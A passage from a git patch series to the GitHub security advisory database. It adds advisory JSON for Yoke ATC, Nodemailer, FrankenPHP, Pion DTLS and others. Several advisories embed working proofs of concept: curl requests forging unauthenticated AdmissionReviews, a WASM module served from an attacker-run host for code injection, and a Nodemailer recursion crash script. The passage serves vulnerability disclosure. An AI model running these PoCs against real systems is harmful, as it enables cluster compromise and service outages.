/tmp/malicious-review.json webhook-attacker:/tmp/malicious-review.json\n```\n\nSend the request:\n```bash\nkubectl exec webhook-attacker -- curl -k -s -X POST \\\n https://atc-atc.atc.svc.cluster.local:80/validations/backends.examples.com \\\n -H \"Content-Type: application/json\" \\\n -d @/tmp/malicious-review.json\n```\n\nActual output from verification:\n```json\n{\"kind\":\"AdmissionReview\",\"apiVersion\":\"admission.k8s.io/v1\",\"request\":{\"uid\":\"vul002-normal-test\",\"kind\":{\"group\":\"examples.com\",\"version\":\"v1\",\"kind\":\"Backend\"},\"resource\":{\"group\":\"examples.com\",\"version\":\"v1\",\"resource\":\"backends\"},\"name\":\"vul002-normal-backend\",\"namespace\":\"default\",\"operation\":\"CREATE\",\"userInfo\":{\"username\":\"attacker-from-pod\",\"groups\":[\"system:unauthenticated\"]},\"object\":{\"apiVersion\":\"examples.com/v1\",\"kind\":\"Backend\",\"metadata\":{\"name\":\"vul002-normal-backend\",\"namespace\":\"default\"},\"spec\":{\"image\":\"nginx:latest\",\"replicas\":1}},\"oldObject\":null,\"options\":null},\"response\":{\"uid\":\"vul002-normal-test\",\"allowed\":false,\"status\":{\"metadata\":{},\"status\":\"Failure\",\"message\":\"applying resource returned errors during dry-run...\"}}}\n```\n\n**Step 4: Verify ATC logs**\n```bash\nkubectl logs -n atc deployment/atc-atc --tail=20 | grep backends.examples.com\n```\n\nActual log output:\n```json\n{\"time\":\"2026-02-01T15:29:08.890991543Z\",\"level\":\"INFO\",\"msg\":\"request served\",\"component\":\"server\",\"code\":200,\"method\":\"POST\",\"path\":\"/validations/backends.examples.com\",\"elapsed\":\"435ms\",\"validation\":{\"allowed\":false,\"status\":\"Invalid\"}}\n```\n\nThe `elapsed: 435ms` indicates WASM module execution occurred.\n\n### Expected Result\n\nThe attacker pod successfully sends AdmissionReview requests directly to the ATC webhook endpoint without any authentication. The ATC controller processes the request and executes the WASM module, proving that:\n1. No TLS client certificate is required\n2. No request source validation occurs\n3. The fake `userInfo` is accepted without verification\n4. WASM modules are executed based on unauthenticated requests\n\n## Impact\n\n**Vulnerability Type**: Missing Authentication / Authentication Bypass\n\n**Attack Prerequisites**:\n- Attacker has access to a pod within the cluster network\n- Network policies do not restrict access to the ATC service (common in default configurations)\n\n**Impact Assessment**:\n- **Confidentiality**: Medium - Attacker can trigger WASM execution which may access controller context data\n- **Integrity**: High - Combined with VUL-001, attacker can create arbitrary Kubernetes resources\n- **Availability**: Medium - Attacker can cause resource exhaustion through repeated requests\n\n**Attack Scenario**:\n1. Attacker compromises a pod or gains access to the cluster network\n2. Attacker sends crafted AdmissionReview requests directly to ATC webhook\n3. ATC processes requests without verifying they came from the API Server\n4. Combined with annotation injection (VUL-001), attacker can execute arbitrary WASM code\n5. Malicious WASM can create resources or exfiltrate data using ATC's cluster-admin privileges\n\n## Severity\n\n**CVSS v3.1 Score**: 7.5 (High)\n\n**Vector**: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n\n- Attack Vector (AV): Network - Accessible from cluster network\n- Attack Complexity (AC): Low - Simple HTTP request\n- Privileges Required (PR): None - No authentication required\n- User Interaction (UI): None - Automatic processing\n- Scope (S): Unchanged\n- Confidentiality (C): None - Direct impact limited\n- Integrity (I): High - Can trigger unauthorized WASM execution\n- Availability (A): None - No direct availability impact\n\nNote: When combined with VUL-001, the overall impact increases significantly.\n\n## Affected Versions\n\n- Yoke ATC v0.18.x and earlier versions\n- All versions that implement Admission Webhook endpoints without client authentication\n\n## Patched Versions\n\nNo patch available at time of disclosure.\n\n## Workarounds\n\n1. **Network Policy**: Deploy NetworkPolicy to restrict access to ATC service, allowing only kube-apiserver to connect\n```yaml\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n name: atc-webhook-policy\n namespace: atc\nspec:\n podSelector:\n matchLabels:\n yoke.cd/app: atc\n policyTypes:\n - Ingress\n ingress:\n - from:\n - namespaceSelector:\n matchLabels:\n kubernetes.io/metadata.name: kube-system\n podSelector:\n matchLabels:\n component: kube-apiserver\n```\n\n2. **Service Mesh**: Use a service mesh (Istio, Linkerd) to enforce mTLS between services\n\n3. **Pod Security**: Implement strict pod security policies to limit which pods can be created in the cluster\n\n## References\n\n- Yoke Project: https://github.com/yokecd/yoke\n- Kubernetes Admission Webhooks: https://kubernetes.io/docs/reference/access-authn-authz/extensible-admission-controllers/\n- CWE-306: Missing Authentication for Critical Function: https://cwe.mitre.org/data/definitions/306.html\n\n## Credits\ncredit for:\n@b0b0haha (603571786@qq.com)\n@lixingquzhi (mayedoushidalao@163.com)", + "severity": [], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/yokecd/yoke" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.19.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/yokecd/yoke/security/advisories/GHSA-965m-v4cc-6334" + }, + { + "type": "PACKAGE", + "url": "https://github.com/yokecd/yoke" + }, + { + "type": "WEB", + "url": "https://github.com/yokecd/yoke/blob/bc9c576a790df8c42aa06b90fb406220f1de22a0/cmd/atc/handler.go#L148-L153" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T22:06:36Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-w4gw-w5jq-g9jh/GHSA-w4gw-w5jq-g9jh.json b/advisories/github-reviewed/2026/02/GHSA-w4gw-w5jq-g9jh/GHSA-w4gw-w5jq-g9jh.json new file mode 100644 index 0000000000000..5bfdaad042cb3 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-w4gw-w5jq-g9jh/GHSA-w4gw-w5jq-g9jh.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w4gw-w5jq-g9jh", + "modified": "2026-02-12T22:06:13Z", + "published": "2026-02-12T22:06:13Z", + "aliases": [ + "CVE-2025-47911" + ], + "summary": "golang.org/x/net/html has a Quadratic Parsing Complexity issue", + "details": "The html.Parse function in golang.org/x/net/html has quadratic parsing complexity when processing certain inputs, which can lead to Denial of Service (DoS) if an attacker provides specially crafted HTML content.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "golang.org/x/net/html" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.45.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47911" + }, + { + "type": "WEB", + "url": "https://github.com/golang/vulndb/issues/4440" + }, + { + "type": "WEB", + "url": "https://go.dev/cl/709876" + }, + { + "type": "PACKAGE", + "url": "https://go.googlesource.com/net" + }, + { + "type": "WEB", + "url": "https://groups.google.com/g/golang-announce/c/jnQcOYpiR2c" + }, + { + "type": "WEB", + "url": "https://pkg.go.dev/vuln/GO-2026-4440" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-407" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-12T22:06:13Z", + "nvd_published_at": "2026-02-05T18:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json b/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json new file mode 100644 index 0000000000000..6827582b45fe6 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-wj8p-jj64-h7ff/GHSA-wj8p-jj64-h7ff.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj8p-jj64-h7ff", + "modified": "2026-02-12T22:07:10Z", + "published": "2026-02-12T22:06:45Z", + "aliases": [ + "CVE-2026-26056" + ], + "summary": "Arbitrary WASM Code Execution via AnnotationOverrideFlight Injection in Yoke ATC", + "details": "# Arbitrary WASM Code Execution via AnnotationOverrideFlight Injection in Yoke ATC\n\nThis vulnerability exists in the Air Traffic Controller (ATC) component of Yoke, a Kubernetes deployment tool. It allows users with CR create/update permissions to execute arbitrary WASM code in the ATC controller context by injecting a malicious URL through the `overrides.yoke.cd/flight` annotation. The ATC controller downloads and executes the WASM module without proper URL validation, enabling attackers to create arbitrary Kubernetes resources or potentially escalate privileges to cluster-admin level.\n\n**Recommended CWE**: CWE-94 (Improper Control of Generation of Code - Code Injection)\n\n## Summary\n\nYoke ATC allows users to override the Flight WASM module URL via the `overrides.yoke.cd/flight` annotation on Custom Resources. The controller only checks if the user has `update` permission on `airways` resources but does not validate the WASM URL source. An attacker with CR create/update permissions can inject a malicious WASM URL, causing the ATC controller to download and execute arbitrary code.\n\n## Details\n\nThe vulnerability exists in two code paths:\n\n**Source Point - Annotation Definition** (`pkg/flight/flight.go:41-42`):\n```go\nconst (\n AnnotationOverrideFlight = \"overrides.yoke.cd/flight\"\n AnnotationOverrideMode = \"overrides.yoke.cd/mode\"\n)\n```\n\n**Sink Point 1 - Admission Webhook** (`cmd/atc/handler.go:298-300`):\n```go\nif overrideURL, _, _ := unstructured.NestedString(cr.Object, \"metadata\", \"annotations\", flight.AnnotationOverrideFlight); overrideURL != \"\" {\n xhttp.AddRequestAttrs(r.Context(), slog.Group(\"overrides\", \"flight\", overrideURL))\n takeoffParams.Flight.Path = overrideURL // User-provided URL used directly\n}\n```\n\n**Sink Point 2 - Reconciler** (`internal/atc/reconciler_instance.go:264-269`):\n```go\nif overrideURL, _, _ := unstructured.NestedString(resource.Object, \"metadata\", \"annotations\", flight.AnnotationOverrideFlight); overrideURL != \"\" {\n ctrl.Logger(ctx).Warn(\"using override module\", \"url\", overrideURL)\n // Simply set the override URL as the flight path and let yoke load and execute the wasm module\n takeoffParams.Flight.Path = overrideURL // User-provided URL used directly without validation\n}\n```\n\nThe permission check at `cmd/atc/handler.go:160-177` only verifies `update` permission on `airways` resources, not the ability to execute arbitrary WASM code:\n```go\naccessReview, err := params.Client.Clientset.AuthorizationV1().SubjectAccessReviews().Create(\n r.Context(),\n &authorizationv1.SubjectAccessReview{\n Spec: authorizationv1.SubjectAccessReviewSpec{\n ResourceAttributes: &authorizationv1.ResourceAttributes{\n Verb: \"update\",\n Group: \"yoke.cd\",\n Version: \"v1alpha1\",\n Resource: \"airways\", // Only checks airway update permission\n },\n },\n },\n)\n```\n\n## PoC\n\n### Environment Setup\n\n**Prerequisites**:\n- Docker installed and running\n- kubectl installed\n- Go 1.21+ installed\n- kind installed\n\n**Step 1: Create Kind cluster**\n```bash\ncat > /tmp/kind-config.yaml << 'EOF'\nkind: Cluster\napiVersion: kind.x-k8s.io/v1alpha4\nname: yoke-vuln-test\nnodes:\n- role: control-plane\nEOF\n\nkind create cluster --config /tmp/kind-config.yaml\n```\n\n**Step 2: Build and install Yoke CLI**\n```bash\n# Clone yoke repository\ngit clone https://github.com/yokecd/yoke.git\ncd yoke\n\n# Build yoke CLI (patch version if needed for compatibility)\nGOPROXY=direct GOSUMDB=off go build -o /tmp/yoke ./cmd/yoke\n\n# Verify installation\n/tmp/yoke version\n```\n\nExpected output:\n```\n╭───────────────────────────────┬──────────╮\n│ yoke │ v0.18.0 │\n│ toolchain │ go1.25.6 │\n│ k8s.io/client-go │ v0.34.1 │\n│ github.com/tetratelabs/wazero │ v1.6.0 │\n╰───────────────────────────────┴──────────╯\n```\n\n**Step 3: Deploy ATC**\n```bash\n/tmp/yoke takeoff --create-namespace --namespace atc -wait 120s atc oci://ghcr.io/yokecd/atc-installer:latest\n```\n\nExpected output:\n```\nCluster-access not granted: enable cluster-access to reuse existing TLS certificates.\nGenerating TLS certificates, this may take a second...\nFinished generating TLS certificates.\n---\nsuccessful takeoff of atc\n```\n\n**Step 4: Verify ATC deployment and permissions**\n```bash\nkubectl get pods -n atc\nkubectl get clusterrolebinding | grep atc\n```\n\nExpected output:\n```\nNAME READY STATUS RESTARTS AGE\natc-atc-6d4bcb7665-wvqkt 1/1 Running 0 22s\n\natc-atc-cluster-role-binding ClusterRole/cluster-admin 22s\n```\n\n**Step 5: Deploy Backend Airway example**\n```bash\n/tmp/yoke takeoff -wait 60s backendairway \"https://github.com/yokecd/examples/releases/download/latest/atc_backend_airway.wasm.gz\"\n```\n\nExpected output:\n```\nsuccessful takeoff of backendairway\n```\n\n### Exploitation Steps\n\n**Step 1: Create malicious WASM module**\n\nCreate `malicious-wasm.go`:\n```go\n// Malicious WASM module for VUL-001 vulnerability verification\npackage main\n\nimport (\n \"encoding/json\"\n \"fmt\"\n)\n\nfunc main() {\n // Create a ConfigMap to prove arbitrary code execution\n resource := map[string]interface{}{\n \"apiVersion\": \"v1\",\n \"kind\": \"ConfigMap\",\n \"metadata\": map[string]interface{}{\n \"name\": \"stolen-credentials\",\n \"namespace\": \"default\",\n \"labels\": map[string]string{\n \"vulnerability\": \"VUL-001\",\n \"type\": \"exfiltrated-token\",\n },\n },\n \"data\": map[string]string{\n \"vulnerability\": \"VUL-001: AnnotationOverrideFlight Injection allows arbitrary WASM execution\",\n \"proof\": \"This ConfigMap was created by malicious WASM code\",\n },\n }\n\n resources := []interface{}{resource}\n output, _ := json.Marshal(resources)\n fmt.Println(string(output))\n}\n```\n\nCompile to WASM:\n```bash\nGOOS=wasip1 GOARCH=wasm go build -o malicious.wasm ./malicious-wasm.go\n```\n\n**Step 2: Host malicious WASM**\n```bash\npython3 -m http.server 8888 &\n```\n\n**Step 3: Get host IP accessible from Kind cluster**\n```bash\nHOST_IP=$(ip addr show docker0 | grep 'inet ' | awk '{print $2}' | cut -d/ -f1)\necho \"Malicious WASM URL: http://${HOST_IP}:8888/malicious.wasm\"\n```\n\n**Step 4: Create malicious Backend CR**\n```bash\nMALICIOUS_URL=\"http://${HOST_IP}:8888/malicious.wasm\"\n\nkubectl apply -f - < Date: Thu, 12 Feb 2026 22:09:23 +0000 Subject: [PATCH 050/215] Publish Advisories GHSA-rcmh-qjqh-p98v GHSA-2f2x-8mwp-p2gc GHSA-74rh-c5rh-88vg GHSA-89p3-4642-cr2w GHSA-9f3f-wv7r-qc8r GHSA-g6x7-jq8p-6q9q GHSA-g966-83w7-6w38 GHSA-px4r-g4p3-hhqv GHSA-r3xh-3r3w-47gp --- .../GHSA-rcmh-qjqh-p98v/GHSA-rcmh-qjqh-p98v.json | 8 ++++---- .../GHSA-2f2x-8mwp-p2gc/GHSA-2f2x-8mwp-p2gc.json | 8 ++++++-- .../GHSA-74rh-c5rh-88vg/GHSA-74rh-c5rh-88vg.json | 12 ++++++++++-- .../GHSA-89p3-4642-cr2w/GHSA-89p3-4642-cr2w.json | 12 ++++++++++-- .../GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json | 4 ++-- .../GHSA-g6x7-jq8p-6q9q/GHSA-g6x7-jq8p-6q9q.json | 8 ++++++-- .../GHSA-g966-83w7-6w38/GHSA-g966-83w7-6w38.json | 15 ++++++++++++--- .../GHSA-px4r-g4p3-hhqv/GHSA-px4r-g4p3-hhqv.json | 8 ++++++-- .../GHSA-r3xh-3r3w-47gp/GHSA-r3xh-3r3w-47gp.json | 15 ++++++++++++--- 9 files changed, 68 insertions(+), 22 deletions(-) diff --git a/advisories/github-reviewed/2025/12/GHSA-rcmh-qjqh-p98v/GHSA-rcmh-qjqh-p98v.json b/advisories/github-reviewed/2025/12/GHSA-rcmh-qjqh-p98v/GHSA-rcmh-qjqh-p98v.json index 913afaf7f10d5..1c6bbf70c4505 100644 --- a/advisories/github-reviewed/2025/12/GHSA-rcmh-qjqh-p98v/GHSA-rcmh-qjqh-p98v.json +++ b/advisories/github-reviewed/2025/12/GHSA-rcmh-qjqh-p98v/GHSA-rcmh-qjqh-p98v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rcmh-qjqh-p98v", - "modified": "2026-02-03T17:37:59Z", + "modified": "2026-02-12T22:09:00Z", "published": "2025-12-01T20:44:25Z", "aliases": [ "CVE-2025-14874" @@ -10,8 +10,8 @@ "details": "### Summary\nA DoS can occur that immediately halts the system due to the use of an unsafe function.\n\n### Details\nAccording to **RFC 5322**, nested group structures (a group inside another group) are not allowed. Therefore, in lib/addressparser/index.js, the email address parser performs flattening when nested groups appear, since such input is likely to be abnormal. (If the address is valid, it is added as-is.) In other words, the parser flattens all nested groups and inserts them into the final group list.\nHowever, the code implemented for this flattening process can be exploited by malicious input and triggers DoS\n\nRFC 5322 uses a colon (:) to define a group, and commas (,) are used to separate members within a group.\nAt the following location in lib/addressparser/index.js:\n\nhttps://github.com/nodemailer/nodemailer/blob/master/lib/addressparser/index.js#L90\n\nthere is code that performs this flattening. The issue occurs when the email address parser attempts to process the following kind of malicious address header:\n\n```g0: g1: g2: g3: ... gN: victim@example.com;```\n\nBecause no recursion depth limit is enforced, the parser repeatedly invokes itself in the pattern\n`addressparser → _handleAddress → addressparser → ...`\nfor each nested group. As a result, when an attacker sends a header containing many colons, Nodemailer enters infinite recursion, eventually throwing Maximum call stack size exceeded and causing the process to terminate immediately. Due to the structure of this behavior, no authentication is required, and a single request is enough to shut down the service.\n\nThe problematic code section is as follows:\n```js\nif (isGroup) {\n ...\n if (data.group.length) {\n let parsedGroup = addressparser(data.group.join(',')); // <- boom!\n parsedGroup.forEach(member => {\n if (member.group) {\n groupMembers = groupMembers.concat(member.group);\n } else {\n groupMembers.push(member);\n }\n });\n }\n}\n```\n`data.group` is expected to contain members separated by commas, but in the attacker’s payload the group contains colon `(:)` tokens. Because of this, the parser repeatedly triggers recursive calls for each colon, proportional to their number.\n\n### PoC\n\n```\nconst nodemailer = require('nodemailer');\n\nfunction buildDeepGroup(depth) {\n let parts = [];\n for (let i = 0; i < depth; i++) {\n parts.push(`g${i}:`);\n }\n return parts.join(' ') + ' user@example.com;';\n}\n\nconst DEPTH = 3000; // <- control depth \nconst toHeader = buildDeepGroup(DEPTH);\nconsole.log('to header length:', toHeader.length);\n\nconst transporter = nodemailer.createTransport({\n streamTransport: true,\n buffer: true,\n newline: 'unix'\n});\n\nconsole.log('parsing start');\n\ntransporter.sendMail(\n {\n from: 'test@example.com',\n to: toHeader,\n subject: 'test',\n text: 'test'\n },\n (err, info) => {\n if (err) {\n console.error('error:', err);\n } else {\n console.log('finished :', info && info.envelope);\n }\n }\n);\n```\nAs a result, when the colon is repeated beyond a certain threshold, the Node.js process terminates immediately.\n\n### Impact\nThe attacker can achieve the following:\n\n1. Force an immediate crash of any server/service that uses Nodemailer\n2. Kill the backend process with a single web request\n3. In environments using PM2/Forever, trigger a continuous restart loop, causing severe resource exhaustion”", "severity": [ { - "type": "CVSS_V4", - "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "affected": [ @@ -68,7 +68,7 @@ "cwe_ids": [ "CWE-703" ], - "severity": "LOW", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2025-12-01T20:44:25Z", "nvd_published_at": null diff --git a/advisories/github-reviewed/2026/02/GHSA-2f2x-8mwp-p2gc/GHSA-2f2x-8mwp-p2gc.json b/advisories/github-reviewed/2026/02/GHSA-2f2x-8mwp-p2gc/GHSA-2f2x-8mwp-p2gc.json index cd4ca07ea21cc..6523eb0bf7b23 100644 --- a/advisories/github-reviewed/2026/02/GHSA-2f2x-8mwp-p2gc/GHSA-2f2x-8mwp-p2gc.json +++ b/advisories/github-reviewed/2026/02/GHSA-2f2x-8mwp-p2gc/GHSA-2f2x-8mwp-p2gc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2f2x-8mwp-p2gc", - "modified": "2026-02-12T15:29:11Z", + "modified": "2026-02-12T22:07:42Z", "published": "2026-02-12T15:29:11Z", "aliases": [ "CVE-2026-21438" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/quic-go/webtransport-go/security/advisories/GHSA-2f2x-8mwp-p2gc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21438" + }, { "type": "PACKAGE", "url": "https://github.com/quic-go/webtransport-go" @@ -60,6 +64,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-12T15:29:11Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T19:15:51Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-74rh-c5rh-88vg/GHSA-74rh-c5rh-88vg.json b/advisories/github-reviewed/2026/02/GHSA-74rh-c5rh-88vg/GHSA-74rh-c5rh-88vg.json index 9e0bd5d594089..7d6a412ae1fcc 100644 --- a/advisories/github-reviewed/2026/02/GHSA-74rh-c5rh-88vg/GHSA-74rh-c5rh-88vg.json +++ b/advisories/github-reviewed/2026/02/GHSA-74rh-c5rh-88vg/GHSA-74rh-c5rh-88vg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-74rh-c5rh-88vg", - "modified": "2026-02-12T15:54:20Z", + "modified": "2026-02-12T22:08:10Z", "published": "2026-02-12T15:54:19Z", "aliases": [ "CVE-2026-26000" @@ -78,6 +78,10 @@ "type": "WEB", "url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-74rh-c5rh-88vg" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26000" + }, { "type": "WEB", "url": "https://github.com/xwiki/xwiki-platform/pull/4645" @@ -94,6 +98,10 @@ "type": "PACKAGE", "url": "https://github.com/xwiki/xwiki-platform" }, + { + "type": "WEB", + "url": "https://github.com/xwiki/xwiki-platform/releases/tag/xwiki-platform-17.4.6" + }, { "type": "WEB", "url": "https://jira.xwiki.org/browse/XWIKI-23433" @@ -110,6 +118,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-12T15:54:19Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T21:16:02Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-89p3-4642-cr2w/GHSA-89p3-4642-cr2w.json b/advisories/github-reviewed/2026/02/GHSA-89p3-4642-cr2w/GHSA-89p3-4642-cr2w.json index 60b66f790119c..d35e95aa616f4 100644 --- a/advisories/github-reviewed/2026/02/GHSA-89p3-4642-cr2w/GHSA-89p3-4642-cr2w.json +++ b/advisories/github-reviewed/2026/02/GHSA-89p3-4642-cr2w/GHSA-89p3-4642-cr2w.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-89p3-4642-cr2w", - "modified": "2026-02-12T15:54:11Z", + "modified": "2026-02-12T22:08:02Z", "published": "2026-02-12T15:54:11Z", "aliases": [ "CVE-2026-25949" @@ -43,6 +43,14 @@ "type": "WEB", "url": "https://github.com/traefik/traefik/security/advisories/GHSA-89p3-4642-cr2w" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25949" + }, + { + "type": "WEB", + "url": "https://github.com/traefik/traefik/commit/31e566e9f1d7888ccb6fbc18bfed427203c35678" + }, { "type": "PACKAGE", "url": "https://github.com/traefik/traefik" @@ -59,6 +67,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2026-02-12T15:54:11Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T20:16:11Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json index 9d5dd79b61f87..f05345733c000 100644 --- a/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json +++ b/advisories/github-reviewed/2026/02/GHSA-9f3f-wv7r-qc8r/GHSA-9f3f-wv7r-qc8r.json @@ -1,13 +1,13 @@ { "schema_version": "1.4.0", "id": "GHSA-9f3f-wv7r-qc8r", - "modified": "2026-02-11T23:14:59Z", + "modified": "2026-02-12T22:07:22Z", "published": "2026-02-11T15:13:12Z", "aliases": [ "CVE-2026-26014" ], "summary": "Pion DTLS's usage of random nonce generation with AES GCM ciphers risks leaking the authentication key", - "details": "### Impact\nPion DTLS versions v1.0.0 through v3.1.0 use random nonce generation with AES GCM ciphers, which makes it easier for remote attackers to obtain the authentication key and spoof data by leveraging the reuse of a nonce in a session and a \"forbidden attack\". \n\n### Patches\nUpgrade to v3.1.0 or later. This version includes PR #796, which uses the 64-bit sequence number to populate the `nonce_explicit` part of the GCM nonce. This is according to best practice outlined in [RFC 9325 section 7.2.1](https://www.rfc-editor.org/rfc/rfc9325#section-7.2.1).\n\n### Workarounds\nThere are no workarounds without upgrading to version v3.1.0 or later.\n\n### References\nCommit fixing the bug: https://github.com/pion/dtls/commit/61762dee8217991882c5eb79856b9e7a73ee349f\nPull request: #796", + "details": "### Impact\nPion DTLS versions v1.0.0 through v3.0.10 use random nonce generation with AES GCM ciphers, which makes it easier for remote attackers to obtain the authentication key and spoof data by leveraging the reuse of a nonce in a session and a \"forbidden attack\". \n\n### Patches\nUpgrade to v3.1.1 or later. This version includes PR #796, which uses the 64-bit sequence number to populate the `nonce_explicit` part of the GCM nonce. This is according to best practice outlined in [RFC 9325 section 7.2.1](https://www.rfc-editor.org/rfc/rfc9325#section-7.2.1). \n\nv3.0.11 is a backport patch supporting Go v1.21\n\n### Workarounds\nThere are no workarounds without upgrading to version v3.0.11, v3.1.1 or later.\n\n### References\nCommit fixing the bug: https://github.com/pion/dtls/commit/61762dee8217991882c5eb79856b9e7a73ee349f\nCommit fixing the bug (backport): 90e241c\nPull request: #796", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/github-reviewed/2026/02/GHSA-g6x7-jq8p-6q9q/GHSA-g6x7-jq8p-6q9q.json b/advisories/github-reviewed/2026/02/GHSA-g6x7-jq8p-6q9q/GHSA-g6x7-jq8p-6q9q.json index 8fc9959301e46..ee210dc46075a 100644 --- a/advisories/github-reviewed/2026/02/GHSA-g6x7-jq8p-6q9q/GHSA-g6x7-jq8p-6q9q.json +++ b/advisories/github-reviewed/2026/02/GHSA-g6x7-jq8p-6q9q/GHSA-g6x7-jq8p-6q9q.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g6x7-jq8p-6q9q", - "modified": "2026-02-12T15:28:52Z", + "modified": "2026-02-12T22:07:29Z", "published": "2026-02-12T15:28:52Z", "aliases": [ "CVE-2026-21434" @@ -43,6 +43,10 @@ "type": "WEB", "url": "https://github.com/quic-go/webtransport-go/security/advisories/GHSA-g6x7-jq8p-6q9q" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21434" + }, { "type": "PACKAGE", "url": "https://github.com/quic-go/webtransport-go" @@ -59,6 +63,6 @@ "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2026-02-12T15:28:52Z", - "nvd_published_at": null + "nvd_published_at": "2026-02-12T19:15:51Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-g966-83w7-6w38/GHSA-g966-83w7-6w38.json b/advisories/github-reviewed/2026/02/GHSA-g966-83w7-6w38/GHSA-g966-83w7-6w38.json index 9ead91f8ceb71..cd2f57023c1f9 100644 --- a/advisories/github-reviewed/2026/02/GHSA-g966-83w7-6w38/GHSA-g966-83w7-6w38.json +++ b/advisories/github-reviewed/2026/02/GHSA-g966-83w7-6w38/GHSA-g966-83w7-6w38.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-g966-83w7-6w38", - "modified": "2026-02-12T15:29:36Z", + "modified": "2026-02-12T22:07:57Z", "published": "2026-02-12T15:29:36Z", "aliases": [ "CVE-2026-24895" ], "summary": "FrankenPHP's unicode case-folding length expansion causes incorrect split_path index (SCRIPT_NAME/PATH_INFO confusion) in FrankenPHP", "details": "### Summary\n\nFrankenPHP’s CGI path splitting logic improperly handles Unicode characters during case conversion. The logic computes the split index (for finding `.php`) on a lowercased copy of the request path but applies that byte index to the original path.\n\nBecause `strings.ToLower()` in Go can increase the byte length of certain UTF-8 characters (e.g., `Ⱥ` expands when lowercased), the computed index may not align with the correct position in the original string. This results in an incorrect `SCRIPT_NAME` and `SCRIPT_FILENAME`, potentially causing FrankenPHP to execute a file other than the one intended by the URI.\n\n### **Details**\n\nThe vulnerability resides in the `splitPos()` function and its usage within `splitCgiPath()`. The logic attempts to find the script extension (e.g., `.php`) in a case-insensitive manner by lowercasing the path:\n\n```go\nlowerPath := strings.ToLower(path)\nidx := strings.Index(lowerPath, strings.ToLower(split))\nreturn idx + len(split)\n```\n\nThe issue is that the returned `idx` represents a byte offset within `lowerPath`. However, `splitCgiPath()` uses this index to slice the **original** `path`:\n\n```go\nfc.docURI = path[:splitPos]\nfc.pathInfo = path[splitPos:]\nfc.scriptName = strings.TrimSuffix(path, fc.pathInfo)\nfc.scriptFilename = sanitizedPathJoin(fc.documentRoot, fc.scriptName)\n```\n\nThis logic relies on the assumption that `len(strings.ToLower(path)) == len(path)`. This assumption is false for certain Unicode characters. For example, the character `Ⱥ` (U+023A) requires 2 bytes in UTF-8 (`0xC8 0xBA`), but its lowercase equivalent `ⱥ` (U+2C65) requires 3 bytes (`0xE2 0xB1 0xA5`).\n\nIf the path contains such characters before the `.php` extension, the index 